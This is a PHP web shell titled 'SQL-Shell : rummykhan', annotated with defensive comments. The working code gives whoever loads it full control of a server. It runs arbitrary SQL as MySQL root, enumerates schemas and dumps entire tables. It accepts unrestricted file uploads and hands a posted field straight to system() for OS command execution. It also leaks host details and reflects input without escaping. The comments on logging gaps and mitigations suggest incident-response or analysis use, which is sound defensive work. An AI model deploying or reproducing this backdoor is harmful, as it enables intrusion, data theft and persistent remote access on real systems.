- <head>
- <title>SQL-Shell : rummykhan </title>
- <style type="text/css">
- .main{
- color:white;
- background-color: black;
- background-image: url(http://s29.postimg.org/isfa5pn8n/Anonymous_1680x1050.jpg);
- }
- .heading{
- color:green;
- font-weight: bold;
- }
- .pad{
- padding: 5px;
- }
- </style>
- </head>
- <body class="main">
- <?php echo '<span class="heading">Server : </span>'.php_uname(); /* discloses the host's OS name, hostname, kernel release and architecture to whoever loads the page */ ?>
- <br>
- <br>
- <center>
- <form method="GET" action="">
- <table>
- <tr>
- <td><span class="heading">Query :</span></td>
- <td><textarea name="usrquery" rows="5" cols="40" ><?php if(isset($_GET['usrquery'])){echo $_GET['usrquery'];} /* the submitted query is echoed back without htmlspecialchars(), so the parameter is reflected into the page as raw markup */ ?></textarea></td>
- </tr>
- <tr>
- <td></td>
- <td><input type="submit" name="runquery" value="Submit"></td>
- </tr>
- </table>
- </form>
- <?php
- error_reporting(0); // turns PHP error reporting off for the rest of the request, so warnings and errors raised below are not shown or logged by PHP; triage has to rely on web-server access logs and file/process telemetry instead
- function querydb($query){ // Executes $query verbatim through the legacy mysql_* API and echoes the result set as an HTML table; returns nothing.
- $counter = 0; // running row number shown in the first column
- $result = mysql_query($query) or die(mysql_error()); // no parameter binding; on failure the raw MySQL error text goes to the client and the script ends. ext/mysql was removed in PHP 7.0, so this code path only exists on PHP 5.x hosts
- echo '<table border="1" width="35%">';
- while($row = mysql_fetch_array($result)){ // default fetch mode returns every column under both a numeric and a named key
- $counter++;
- echo '<tr>';
- echo '<td class="pad">'.$counter.'</td>';
- for ($i=0; $i < count($row); $i++) { // count() includes the named keys, so $i runs past the last numeric index
- if(isset($row[$i])){ // filters out the out-of-range indices; NULL cells are dropped as well
- echo '<td class="pad">'.$row[$i].'</td>'; // cell value is written without HTML escaping, so stored markup renders in the viewer's browser
- }
- }
- echo '</tr>';
- }
- $counter=0; // no effect: $counter is a local that is not read again
- echo '</table>';
- }
- $user = 'root'; // connection + dispatch section: hard-coded MySQL superuser account
- $pass = ''; // empty password: the connection below succeeds only where MySQL root was left without one
- $host = 'localhost';
- $db = $_GET['db']; // schema name taken from the query string, unvalidated
- $table = $_GET['tbl']; // table name taken from the query string, unvalidated
- $usrquery = $_GET['usrquery']; // free-form SQL; the form submits with GET, so the statement text is normally recorded in the web server's access log as part of the request line
- if(mysql_connect($host,$user,$pass)){
- if(isset($usrquery)){
- mysql_select_db($_COOKIE['db']); // schema for free-form queries comes from the client-controlled 'db' cookie set further down
- if (strpos($usrquery, 'INSERT')!==false || strpos($usrquery, 'UPDATE')!==false) { // routing is a case-sensitive substring test, not SQL parsing; it does not reliably bound which statement types ran, so reconstruct activity from the logged usrquery values
- if(mysql_query($usrquery)){
- echo 'Query Success<br>';
- }else{
- die(mysql_error());
- }
- }elseif (strpos($usrquery, 'SELECT')!==false || strpos($usrquery, 'select')!==false) {
- echo '<span class="heading">Your Query Output : </span><br>';
- querydb($usrquery); // request text is handed to mysql_query() unchanged inside querydb()
- }
- }
- if($db==''){ // no db parameter: list every schema visible to the connected account
- echo '<span class="heading">DBs : </span><br>';
- querydb('SELECT schema_name FROM information_schema.schemata');
- }else{
- setcookie('db',$db); // remembers the chosen schema in the 'db' cookie read above
- if(isset($table) && isset($db)){
- echo '<span class="heading">Columns : </span><br>';
- querydb("SELECT column_name FROM information_schema.columns WHERE table_schema='".$db."' AND table_name = '".$table."'"); // db and tbl request values are concatenated straight into the SQL string
- echo '<span class="heading">Data : </span><br>';
- querydb("SELECT * FROM ".$db.".".$table); // returns every row of the named table in one response
- }else{
- echo '<span class="heading">Tables : </span><br>';
- querydb("SELECT table_name FROM information_schema.tables where table_schema='".$db."'");
- }
- }
- }else{
- die(mysql_error()); // connection refused (e.g. root has a password): the MySQL error text is printed and the script stops here
- }
- // Uploader: handles the multipart form that posts _upl=Upload together with a "file" part.
- echo '<br>';
- if($_POST["_upl"] == "Upload" ) {if(@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Upload !!!</b><br><br>"; }} // copies the uploaded temp file to a relative path (normally the script's own directory) under its client-supplied name, with no extension, type or size check; @ hides any failure. Defensive controls: deny script execution in web-writable directories and alert on new files created by the web-server account
- ?>
- <html><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file"><input name="_upl" type="submit" id="_upl" value="Upload"></form></html>
- <form method="POST" action="">
- <span class="heading">cmd@b0x : </span>
- <input type="text" name="system" value="<?php if(isset($_POST['system'])){echo $_POST['system'];}/* POST value is reflected into the attribute without htmlspecialchars() */?>">
- <input type="submit" name="execute" value="Execute">
- </form>
- <span class="heading">
- <?php
- if(isset($_POST['execute'])){ // runs only when the "Execute" submit button was posted
- if(!empty($_POST['system'])){
- system($_POST['system']); // hands the POST field to the OS shell unmodified, under the web-server account, and streams the output into the page. POST bodies are absent from default access logs, so detection relies on child processes spawned by the web-server/PHP worker; listing system (with exec, shell_exec, passthru, popen, proc_open) in php.ini disable_functions blocks this call
- }
- }
- ?>
- </span>
- </center>
- </body>